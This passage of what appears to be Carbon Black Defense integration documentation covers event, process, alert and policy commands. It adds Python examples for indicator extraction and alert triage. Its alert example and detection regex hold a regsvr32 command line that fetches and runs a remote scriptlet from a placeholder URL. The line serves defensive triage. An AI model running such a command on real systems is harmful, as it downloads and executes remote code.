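                md5.add(app["Md5Hash"].lower())
        flow = event.get("NetFlow") or {}
        if flow.get("DestAddress") and flow.get("DestPort") is not None:
            destinations.add(f"{flow['DestAddress']}:{flow['DestPort']}")
    return {"sha256": sorted(sha256), "md5": sorted(md5), "destinations": sorted(destinations)}


def to_standard_context(event):
    """Map one event onto the Endpoint / Process keys the page's context example
    shows. The source-field choice for each key is this example's own."""
    dev = event.get("DeviceDetails") or {}
    proc = event.get("ProcessDetails") or {}
    app = event.get("SelectedApp") or {}
    return {
        "Endpoint": {"Domain": None, "Hostname": dev.get("DeviceName"),
                     "IPAddress": dev.get("DeviceIpAddress"), "OS": dev.get("DeviceType")},
        "Process": {"Path": app.get("ApplicationPath"), "SHA1": None, "ParentID": None,
                    "PID": proc.get("ProcessId"), "Name": proc.get("Name"),
                    "Endpoint": dev.get("DeviceName"), "ParentName": None,
                    "MD5": app.get("Md5Hash"), "CommandLine": proc.get("CommandLine")},
    }


if __name__ == "__main__":
    print(build_find_events_command(
        sha256hash="F649CE0C8D5CA63BE86E00877632C6390AF772EED86C07B3DB5B818C30AB700B", rows=5))
    print(extract_indicators(SAMPLE_EVENTS))
    print(to_standard_context(SAMPLE_EVENTS[0]))
```

The hash check is deliberately strict: a truncated or non-hex value is a data-entry error, and failing the playbook step early is cheaper than an empty result set that looks like "no activity for this file".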
Get a specified event
Returns the details of a specified event.
Base Command
cbd-find-event
Input
Parameter | Description |
---|---|
eventId | Event ID |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.FindEvent.EventInfo.ShortDescription | Short description |
CarbonBlackDefense.FindEvent.EventInfo.TargetHash.ApplicationName | Application name |
CarbonBlackDefense.FindEvent.EventInfo.TargetHash.ReputationProperty | Reputation property |
CarbonBlackDefense.FindEvent.EventInfo.TargetHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.FindEvent.EventInfo.EventType | Event type |
CarbonBlackDefense.FindEvent.EventInfo.ProcessHash.Md5Hash | MD5 hash |
CarbonBlackDefense.FindEvent.EventInfo.ProcessHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.FindEvent.EventInfo.ProcessHash.ApplicationPath | Application path |
CarbonBlackDefense.FindEvent.EventInfo.ProcessHash.ReputationProperty | Reputation property |
CarbonBlackDefense.FindEvent.EventInfo.ProcessHash.ApplicationName | Application name |
CarbonBlackDefense.FindEvent.EventInfo.OrgDetails.OrganizationId | Organization ID |
CarbonBlackDefense.FindEvent.EventInfo.OrgDetails.OrganizationName | Organization name |
CarbonBlackDefense.FindEvent.EventInfo.OrgDetails.OrganizationType | Organization type |
CarbonBlackDefense.FindEvent.EventInfo.ParentHash.ApplicationName | Application name |
CarbonBlackDefense.FindEvent.EventInfo.ParentHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.FindEvent.EventInfo.EventId | Event ID |
CarbonBlackDefense.FindEvent.EventInfo.LongDescription | Long description |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceIpV4Address | Device IPv4 address |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceType | Device type |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.Email | Email address |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.TargetPriorityCode | Target priority code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.AgentLocation | Agent location |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceHostName | Device host name |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceId | Device ID |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.GroupName | Group name |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceVersion | Device version |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.TargetPriorityType | Target priority type |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceIpAddress | Device IP address |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.Latitude | Latitude |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.City | City |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.CountryCode | Country code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.DmaCode | DMA code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.Longitude | Longitude |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.MetroCode | Metro code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.PostalCode | Postal code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.Region | Region |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.AreaCode | Area code |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceLocation.CountryName | Country name |
CarbonBlackDefense.FindEvent.EventInfo.DeviceDetails.DeviceName | Device name |
CarbonBlackDefense.FindEvent.EventInfo.CreateTime | Time of creation |
CarbonBlackDefense.FindEvent.EventInfo.EventTime | Event time |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.FullUserName | Full user name |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.Name | Name |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.ParentCommandLine | Parent command line |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.ParentName | Parent name |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.ParentPid | Parent PID |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.ProcessId | Process ID |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.CommandLine | Command line |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.MilisSinceProcessStart | Milliseconds since process start |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.TargetCommandLine | Target command line |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.TargetPid | Target PID |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.UserName | User name |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.ParentPrivatePid | Parent private PID |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.PrivatePid | Private PID |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.TargetName | Target name |
CarbonBlackDefense.FindEvent.EventInfo.ProcessDetails.TargetPrivatePid | Target private PID |
CarbonBlackDefense.FindEvent.EventInfo.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"
Context Example
    {
        "CarbonBlackDefense": {
            "FindEvent": {
                "EventInfo": {
                    "ShortDescription": "The application \"cloud-drive-ui\" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22).",
                    "LongDescription": "The application \"/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui\" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful.",
                    "EventTime": 1533649991975,
                    "CreateTime": 1533650036964,
                    "DeviceDetails": {
                        "DeviceName": "cberninger-mac2",
                        "DeviceVersion": "MAC OS X 10.10.5",
                        "TargetPriorityCode": 1,
                        "DeviceHostName": null,
                        "GroupName": null,
                        "DeviceLocation": {
                            "CountryName": "United States",
                            "CountryCode": "US",
                            "DmaCode": 0,
                            "MetroCode": 0,
                            "City": null,
                            "Latitude": 37.751007,
                            "Longitude": -97.822,
                            "Region": null,
                            "PostalCode": null,
                            "AreaCode": 0
                        },
                        "TargetPriorityType": "MEDIUM",
                        "DeviceType": "MAC",
                        "DeviceId": 844355,
                        "DeviceIpAddress": "67.143.208.113",
                        "DeviceIpV4Address": "67.143.208.113",
                        "AgentLocation": "OFFSITE",
                        "Email": "cberninger"
                    },
                    "ProcessDetails": {
                        "ParentPid": null,
                        "FullUserName": "cberninger",
                        "PrivatePid": "1071-1533502548722-245",
                        "ProcessId": 1071,
                        "Name": "cloud-drive-ui",
                        "TargetCommandLine": null,
                        "ParentPrivatePid": null,
                        "MilisSinceProcessStart": 147443253,
                        "ParentName": null,
                        "ParentCommandLine": null,
                        "UserName": "cberninger",
                        "TargetPrivatePid": null,
                        "TargetPid": null,
                        "TargetName": null,
                        "CommandLine": null
                    },
                    "EventType": "NETWORK",
                    "EventId": "4ad25ae99a4911e88515b3c49ffeda59",
                    "ParentHash": {
                        "ApplicationName": null,
                        "Sha256Hash": null
                    },
                    "ProcessHash": {
                        "ApplicationName": null,
                        "ApplicationPath": null,
                        "Md5Hash": null,
                        "ReputationProperty": null,
                        "Sha256Hash": null
                    },
                    "ThreatIndicators": [
                        "UNKNOWN_APP",
                        "NETWORK_FLOW"
                    ],
                    "OrgDetails": {
                        "OrganizationId": null,
                        "OrganizationName": null,
                        "OrganizationType": null
                    },
                    "TargetHash": {
                        "ApplicationName": null,
                        "ReputationProperty": null,
                        "Sha256Hash": null
                    }
                }
            }
        }
    }
Human Readable Output
CreateTime | 1533650036964 |
---|---|
DeviceDetails AgentLocation | OFFSITE |
DeviceDetails DeviceHostName | |
DeviceDetails DeviceId | 844355 |
DeviceDetails DeviceIpAddress | 67.143.208.113 |
DeviceDetails DeviceIpV4Address | 67.143.208.113 |
DeviceDetails DeviceLocation AreaCode | 0 |
DeviceDetails DeviceLocation City | |
DeviceDetails DeviceLocation CountryCode | US |
DeviceDetails DeviceLocation CountryName | United States |
DeviceDetails DeviceLocation DmaCode | 0 |
DeviceDetails DeviceLocation Latitude | 37.751007 |
DeviceDetails DeviceLocation Longitude | -97.822 |
DeviceDetails DeviceLocation MetroCode | 0 |
DeviceDetails DeviceLocation PostalCode | |
DeviceDetails DeviceLocation Region | |
DeviceDetails DeviceName | cberninger-mac2 |
DeviceDetails DeviceType | MAC |
DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
DeviceDetails Email | cberninger |
Get multiple processes
Returns the details of multiple processes, as specified by further input.
Base Command
cbd-find-processes
Input
Parameter | Description | More Information |
---|---|---|
hostNameExact | The exact host name | Case sensitive. |
ownerName | Owner name | Case insensitive. |
ownerNameExact | Exact owner name | Case sensitive. |
ipAddress | External or internal IP address | - |
searchWindow | Processes with events generated within this time frame | Default is one day. Events might not be available after 30 days due to retention policies. |
start | Shows results from this row onward | - |
rows | Maximum number of result rows | This parameter can be capped on the Cb Defense server side. |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.GetProcesses.ApplicationName | Application name |
CarbonBlackDefense.GetProcesses.ProcessId | Process ID |
CarbonBlackDefense.GetProcesses.NumEvents | Number of events |
CarbonBlackDefense.GetProcesses.ApplicationPath | Application path |
CarbonBlackDefense.GetProcesses.PrivatePid | Private PID |
CarbonBlackDefense.GetProcesses.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetProcesses.TotalResults | Total results |
Command Example
!cbd-find-processes ipAddress="67.143.208.113" rows=2
Context Example
    {
        "CarbonBlackDefense": {
            "GetProcesses": [
                {
                    "ApplicationName": "Google Chrome",
                    "ApplicationPath": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
                    "NumEvents": 3580,
                    "PrivatePid": "81577-1533502547808-202",
                    "ProcessId": 81577,
                    "Sha256Hash": "19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d"
                },
                {
                    "ApplicationName": "cloud-drive-ui",
                    "ApplicationPath": "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui",
                    "NumEvents": 2038,
                    "PrivatePid": "1071-1533502548722-245",
                    "ProcessId": 1071,
                    "Sha256Hash": "f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b"
                },
                {
                    "TotalResults": 2
                }
            ]
        }
    }
Human Readable Output
ApplicationName | ApplicationPath | NumEvents | PrivatePid | ProcessId | Sha256Hash |
---|---|---|---|---|---|
Google Chrome | /Applications/Google Chrome.app/Contents/MacOS/Google Chrome | 3580 | 81577-1533502547808-202 | 81577 | 19509e92f048f64692a3bc8786f7e74906541c4b548964c69a22ad9e44e43a2d |
cloud-drive-ui | /Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui | 2038 | 1071-1533502548722-245 | 1071 | f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b |
Get alert details
Returns the details of a specified alert.
Base Command
cbd-get-alert-details
Input
Parameter | Description |
alertId | Alert ID |
Context Output
Path | Description |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Group | Group |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.GroupId | Group ID |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.RegisteredTime | Registered time |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.DeviceName | Device name |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Status | Status |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.OsVersion | OS version |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.UserName | User name |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Importance | Importance |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Message | Message |
CarbonBlackDefense.GetAlertDetails.DeviceInfo.Success | Success |
CarbonBlackDefense.GetAlertDetails.Events.ParentHash | Parent hash |
CarbonBlackDefense.GetAlertDetails.Events.PolicyState | Policy state |
CarbonBlackDefense.GetAlertDetails.Events.LongDescription | Long description |
CarbonBlackDefense.GetAlertDetails.Events.ParentPid | Parent PID |
CarbonBlackDefense.GetAlertDetails.Events.ProcessId | Process ID |
CarbonBlackDefense.GetAlertDetails.Events.ThreatIndicators | Threat indicators |
CarbonBlackDefense.GetAlertDetails.Events.ApplicationPath | Application path |
CarbonBlackDefense.GetAlertDetails.Events.ProcessHash | Process hash |
CarbonBlackDefense.GetAlertDetails.Events.ProcessMd5Hash | Process MD5 hash |
CarbonBlackDefense.GetAlertDetails.Events.EventId | Event ID |
CarbonBlackDefense.GetAlertDetails.Events.EventTime | Event time |
CarbonBlackDefense.GetAlertDetails.Events.EventType | Event type |
CarbonBlackDefense.GetAlertDetails.Events.KillChainStatus | Kill chain status |
CarbonBlackDefense.GetAlertDetails.Events.ParentName | Parent name |
CarbonBlackDefense.GetAlertDetails.Events.ParentPPid | Parent process's parent PID (PPID) |
CarbonBlackDefense.GetAlertDetails.Events.ProcessPPid | Process's parent PID (PPID) |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.IncidentId | Incident ID |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.ApplicationName | Application name |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.IndicatorName | Indicator name |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Indicators.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Summary | Summary |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatId | Threat ID |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.ThreatScore | Threat score |
CarbonBlackDefense.GetAlertDetails.ThreatInfo.Time | Time |
Command Example
!cbd-get-alert-details alertId=HWOXYQ6P
Context Example
```json
{
  "Account": { ... },
  "CarbonBlackDefense": {
    "GetAlertDetails": {
      "DeviceInfo": {
        "DeviceInfo": {
          "DeviceName": "ECIADWS7",
          "Success": true,
          "Message": "success",
          "RegisteredTime": 1525879595477,
          "DeviceType": "WINDOWS",
          "DeviceId": 896327,
          "Status": "REGISTERED",
          "OsVersion": "Windows 7 x86 SP: 1",
          "Importance": "MEDIUM",
          "UserName": "EVILCORP\\Expel",
          "GroupId": 0,
          "SensorVersion": "3.1.0.100",
          "Group": null
        },
        "Events": { ... },
        "OrgId": 1105,
        "ThreatInfo": {
          "IncidentId": "HWOXYQ6P",
          "Indicators": {
            "ApplicationName": [ ... ],
            "IndicatorName": [ ... ],
            "Sha256Hash": [ ... ]
          },
          "Summary": "The application regsvr32.exe is executing an encoded fileless script.",
          "ThreatId": "218c1859d76eb42113590f9da21e2cec",
          "ThreatScore": 5,
          "Time": 1533253999790
        }
      }
    }
  },
  "Endpoint": {
    "Hostname": "ECIADWS7",
    "OS": "WINDOWS"
  },
  "Process": {
    "CommandLine": "regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll",
    "Endpoint": "ECIADWS7",
    "MD5": "432be6cf7311062633459eef6b242fb5",
    "PID": 12804,
    "ParentID": 10808,
    "ParentName": "alert_generator.bat",
    "Path": "C:\\Windows\\System32\\regsvr32.exe"
  }
}
```
The Account context, the 17 Events fields and the three Indicators arrays (64 entries each) are collapsed in the captured example and shown as `...`. Note that the captured context nests DeviceInfo one level deeper (GetAlertDetails.DeviceInfo.DeviceInfo) than the paths in the Context Output table above; automations should be written against the shape they actually receive.
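The alert context above is what an analyst playbook receives. The following is an added example, written for this page and not part of the Demisto integration or the Carbon Black API, that reduces such a context to a triage record: device, user, parent-to-child process chain, IOCs to pivot on, and an escalation decision. The sample alert is constructed from the Context Example for alertId HWOXYQ6P (including its nested DeviceInfo layout); the regsvr32 scriptlet pattern and the score threshold of 7 are the example's own assumptions.

```python
"""Triage of a cbd-get-alert-details context (added example, not integration code)."""
import re
from typing import Any, Dict, List

# Constructed from the page's Context Example for alertId HWOXYQ6P.
SAMPLE_ALERT: Dict[str, Any] = {
    "CarbonBlackDefense": {
        "GetAlertDetails": {
            "DeviceInfo": {
                "DeviceInfo": {
                    "DeviceName": "ECIADWS7",
                    "DeviceType": "WINDOWS",
                    "DeviceId": 896327,
                    "OsVersion": "Windows 7 x86 SP: 1",
                    "UserName": "EVILCORP\\Expel",
                },
                "ThreatInfo": {
                    "IncidentId": "HWOXYQ6P",
                    "Summary": "The application regsvr32.exe is executing an encoded fileless script.",
                    "ThreatId": "218c1859d76eb42113590f9da21e2cec",
                    "ThreatScore": 5,
                    "Time": 1533253999790,
                },
            }
        }
    },
    "Process": {
        "CommandLine": "regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll",
        "Endpoint": "ECIADWS7",
        "MD5": "432be6cf7311062633459eef6b242fb5",
        "PID": 12804,
        "ParentID": 10808,
        "ParentName": "alert_generator.bat",
        "Path": "C:\\Windows\\System32\\regsvr32.exe",
    },
}

# regsvr32 loading a scriptlet from a URL through scrobj.dll is a well-known
# living-off-the-land pattern; the /i: switch carries the remote scriptlet URL.
REGSVR32_REMOTE_SCRIPTLET = re.compile(
    r"(?i)^\s*(?:\S*\\)?regsvr32(?:\.exe)?\b.*?/i:(?P<url>https?://\S+).*\bscrobj\.dll\b"
)

# Assumed escalation threshold for the sensor's ThreatScore (not from the page).
ESCALATE_SCORE = 7


def triage_alert(ctx: Dict[str, Any]) -> Dict[str, Any]:
    """Reduce an alert context to the facts an analyst acts on first."""
    details = ctx["CarbonBlackDefense"]["GetAlertDetails"]["DeviceInfo"]
    device = details["DeviceInfo"]
    threat = details["ThreatInfo"]
    proc = ctx.get("Process", {})
    cmdline = proc.get("CommandLine", "")

    match = REGSVR32_REMOTE_SCRIPTLET.search(cmdline)
    iocs: List[Dict[str, str]] = []
    if proc.get("MD5"):
        iocs.append({"type": "md5", "value": proc["MD5"]})
    if match:
        iocs.append({"type": "url", "value": match.group("url")})

    return {
        "incident_id": threat["IncidentId"],
        "host": device["DeviceName"],
        "user": device["UserName"],
        "threat_score": threat["ThreatScore"],
        "process_chain": f"{proc.get('ParentName')} ({proc.get('ParentID')}) -> "
                         f"{proc.get('Path')} ({proc.get('PID')})",
        "regsvr32_remote_scriptlet": bool(match),
        "iocs": iocs,
        # Escalate on the LOLBin pattern regardless of score, or on a high score.
        "escalate": bool(match) or threat["ThreatScore"] >= ESCALATE_SCORE,
    }


if __name__ == "__main__":
    print(triage_alert(SAMPLE_ALERT))
```

The URL pulled from `/i:` is the artifact worth blocking and hunting for across other endpoints; the MD5 of regsvr32.exe itself is a legitimate system binary and is included only so the record is complete.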
Get all policy details
Returns the details of all policies.
Base Command
cbd-get-policies
Input
There is no input for this command.
Context Output
Path | Description |
CarbonBlackDefense.GetPolicies.Id | The policy ID |
CarbonBlackDefense.GetPolicies.PriorityLevel | The policy's priority level |
CarbonBlackDefense.GetPolicies.SystemPolicy | System policy ( boolean ) |
CarbonBlackDefense.GetPolicies.LatestRevision | The policy's latest revision |
CarbonBlackDefense.GetPolicies.Policy | The policy object |
Command Example
!cbd-get-policies
Context Example
```json
{
  "CarbonBlackDefense": {
    "GetPolicies": [
      {
        "Id": 6525,
        "LatestRevision": 1488926710902,
        "Policy": {
          "avSettings": {
            "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 },
            "features": [
              { "enabled": false, "name": "SIGNATURE_UPDATE" },
              { "enabled": false, "name": "ONACCESS_SCAN" },
              { "enabled": true, "name": "ONDEMAND_SCAN" }
            ],
            "onAccessScan": { "profile": "NORMAL" },
            "onDemandScan": {
              "profile": "NORMAL",
              "scanCdDvd": "AUTOSCAN",
              "scanUsb": "AUTOSCAN",
              "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 }
            },
            "signatureUpdate": {
              "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 4 }
            },
            "updateServers": {
              "servers": [
                { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] }
              ],
              "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ]
            }
          },
          "directoryActionRules": [],
          "id": -1,
          "knownBadHashAutoDeleteDelayMs": null,
          "rules": [],
          "sensorSettings": [
            { "name": "ALLOW_UNINSTALL", "value": "true" },
            { "name": "ALLOW_UPLOADS", "value": "false" },
            { "name": "SHOW_UI", "value": "false" },
            { "name": "ENABLE_THREAT_SHARING", "value": "true" },
            { "name": "QUARANTINE_DEVICE", "value": "false" },
            { "name": "LOGGING_LEVEL", "value": "NORMAL" },
            { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined. Please contact your administrator." },
            { "name": "SET_SENSOR_MODE", "value": "0" },
            { "name": "SENSOR_RESET", "value": "0" },
            { "name": "BACKGROUND_SCAN", "value": "false" },
            { "name": "POLICY_ACTION_OVERRIDE", "value": "true" },
            { "name": "HELP_MESSAGE", "value": "" },
            { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" },
            { "name": "HASH_MD5", "value": "false" },
            { "name": "SCAN_LARGE_FILE_READ", "value": "false" },
            { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "false" },
            { "name": "DELAY_EXECUTE", "value": "false" },
            { "name": "SCAN_NETWORK_DRIVE", "value": "false" },
            { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" },
            { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" },
            { "name": "SHOW_FULL_UI", "value": "false" },
            { "name": "SECURITY_CENTER_OPT", "value": "false" },
            { "name": "CB_LIVE_RESPONSE", "value": "false" },
            { "name": "UNINSTALL_CODE", "value": "false" }
          ]
        },
        "PriorityLevel": "MEDIUM",
        "SystemPolicy": true
      },
      ...
    ]
  }
}
```
The captured response contained 40 policies; only the first is shown.
Get the details of a specified policy
Returns the details of a specified policy.
Base Command
cbd-get-policy
Input
Parameter | Description |
policyId | Policy ID |
Context Output
Path | Description |
CarbonBlackDefense.GetPolicy.Id | The policy ID |
CarbonBlackDefense.GetPolicy.PriorityLevel | The policy's priority level |
CarbonBlackDefense.GetPolicy.SystemPolicy | System policy ( boolean ) |
CarbonBlackDefense.GetPolicy.LatestRevision | The policy's latest revision |
CarbonBlackDefense.GetPolicy.Policy | The policy object |
Command Example
!cbd-get-policy policyId=6525
Context Example
```json
{
  "CarbonBlackDefense": {
    "GetPolicy": {
      "Id": 6525,
      "LatestRevision": 1488926710902,
      "Policy": {
        "avSettings": {
          "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 },
          "features": [
            { "enabled": false, "name": "SIGNATURE_UPDATE" },
            { "enabled": false, "name": "ONACCESS_SCAN" },
            { "enabled": true, "name": "ONDEMAND_SCAN" }
          ],
          "onAccessScan": { "profile": "NORMAL" },
          "onDemandScan": {
            "profile": "NORMAL",
            "scanCdDvd": "AUTOSCAN",
            "scanUsb": "AUTOSCAN",
            "schedule": { "days": null, "rangeHours": 0, "recoveryScanIfMissed": true, "startHour": 0 }
          },
          "signatureUpdate": {
            "schedule": { "fullIntervalHours": 0, "initialRandomDelayHours": 4, "intervalHours": 4 }
          },
          "updateServers": {
            "servers": [
              { "flags": 0, "regId": null, "server": [ "http://updates.cdc.carbonblack.io/update" ] }
            ],
            "serversForOffSiteDevices": [ "http://updates.cdc.carbonblack.io/update" ]
          }
        },
        "directoryActionRules": [],
        "id": -1,
        "knownBadHashAutoDeleteDelayMs": null,
        "rules": [],
        "sensorSettings": [
          { "name": "ALLOW_UNINSTALL", "value": "true" },
          { "name": "ALLOW_UPLOADS", "value": "false" },
          { "name": "SHOW_UI", "value": "false" },
          { "name": "ENABLE_THREAT_SHARING", "value": "true" },
          { "name": "QUARANTINE_DEVICE", "value": "false" },
          { "name": "LOGGING_LEVEL", "value": "NORMAL" },
          { "name": "QUARANTINE_DEVICE_MESSAGE", "value": "Your device has been quarantined. Please contact your administrator." },
          { "name": "SET_SENSOR_MODE", "value": "0" },
          { "name": "SENSOR_RESET", "value": "0" },
          { "name": "BACKGROUND_SCAN", "value": "false" },
          { "name": "POLICY_ACTION_OVERRIDE", "value": "true" },
          { "name": "HELP_MESSAGE", "value": "" },
          { "name": "PRESERVE_SYSTEM_MEMORY_SCAN", "value": "false" },
          { "name": "HASH_MD5", "value": "false" },
          { "name": "SCAN_LARGE_FILE_READ", "value": "false" },
          { "name": "SCAN_EXECUTE_ON_NETWORK_DRIVE", "value": "false" },
          { "name": "DELAY_EXECUTE", "value": "false" },
          { "name": "SCAN_NETWORK_DRIVE", "value": "false" },
          { "name": "BYPASS_AFTER_LOGIN_MINS", "value": "0" },
          { "name": "BYPASS_AFTER_RESTART_MINS", "value": "0" },
          { "name": "SHOW_FULL_UI", "value": "false" },
          { "name": "SECURITY_CENTER_OPT", "value": "false" },
          { "name": "CB_LIVE_RESPONSE", "value": "false" },
          { "name": "UNINSTALL_CODE", "value": "false" }
        ]
      },
      "PriorityLevel": "MEDIUM",
      "SystemPolicy": true
    }
  }
}
```
Human Readable Output
Id | 6525 |
---|---|
LatestRevision | 1488926710902 |
Policy | {"rules":[],"id":-1,"sensorSettings":[{"name":"ALLOW_UNINSTALL","value":"true"},{"name":"ALLOW_UPLOADS","value":"false"},{"name":"SHOW_UI","value":"false"},{"name":"ENABLE_THREAT_SHARING","value":"true"},{"name":"QUARANTINE_DEVICE","value":"false"},{"name":"LOGGING_LEVEL","value":"NORMAL"},{"name":"QUARANTINE_DEVICE_MESSAGE","value":"Your device has been quarantined. Please contact your administrator."},{"name":"SET_SENSOR_MODE","value":"0"},{"name":"SENSOR_RESET","value":"0"},{"name":"BACKGROUND_SCAN","value":"false"},{"name":"POLICY_ACTION_OVERRIDE","value":"true"},{"name":"HELP_MESSAGE","value":""},{"name":"PRESERVE_SYSTEM_MEMORY_SCAN","value":"false"},{"name":"HASH_MD5","value":"false"},{"name":"SCAN_LARGE_FILE_READ","value":"false"},{"name":"SCAN_EXECUTE_ON_NETWORK_DRIVE","value":"false"},{"name":"DELAY_EXECUTE","value":"false"},{"name":"SCAN_NETWORK_DRIVE","value":"false"},{"name":"BYPASS_AFTER_LOGIN_MINS","value":"0"},{"name":"BYPASS_AFTER_RESTART_MINS","value":"0"},{"name":"SHO ...http://updates.cdc.carbonblack.io/update"],"servers":[{"server":["http://updates.cdc.carbonblack.io/update"],"flags":0,"regId":null}]},"apc":{"maxFileSize":4,"maxExeDelay":45,"riskLevel":4,"enabled":false},"onAccessScan":{"profile":"NORMAL"},"onDemandScan":{"profile":"NORMAL","scanCdDvd":"AUTOSCAN","scanUsb":"AUTOSCAN","schedule":{"days":null,"rangeHours":0,"startHour":0,"recoveryScanIfMissed":true}},"signatureUpdate":{"schedule":{"intervalHours":4,"fullIntervalHours":0,"initialRandomDelayHours":4}}},"knownBadHashAutoDeleteDelayMs":null,"directoryActionRules":[]} |
PriorityLevel | MEDIUM |
SystemPolicy | true |
Create a policy
Creates a policy from the supplied name, description, priority level and policy object.
Base Command
cbd-create-policy
Input
Parameter | Description |
description | Policy description. |
name | A single-line name for the policy. |
priorityLevel | Priority level associated with sensors assigned to this policy (for example LOW or MEDIUM, as in the examples on this page). |
policy | JSON object containing the policy details. Make sure a valid policy object is passed; the cbd-get-policy output above shows the expected shape (avSettings, directoryActionRules, id, rules, sensorSettings). |
Context Output
Path | Description |
CarbonBlackDefense.CreatePolicy.PolicyId | The new policy ID |
Command Example
```
!cbd-create-policy priorityLevel=LOW name=YARDENTEST3 description=yardentesttest3 policy={
  "policyInfo": {
    "description": "test policy for documentation",
    "name": "documentation test",
    "policy": {
      "avSettings": {
        "apc": { "enabled": false, "maxExeDelay": 45, "maxFileSize": 4, "riskLevel": 4 },
        "features": [
          { "enabled": false, "name": "SIGNATURE_UPDATE" },
          { "enabled": true, "name": "ONACCESS_SCAN" },
          { "enabled": true, "name": "ONDEMAND_SCAN" }
        ],
        "onAccessScan": { "profile": "NORMAL" },
        "onDemandScan": {
          "profile": "NORMAL", "scanCdDvd": "AUTOSCAN", "scanUsb": "AUTOSCAN",
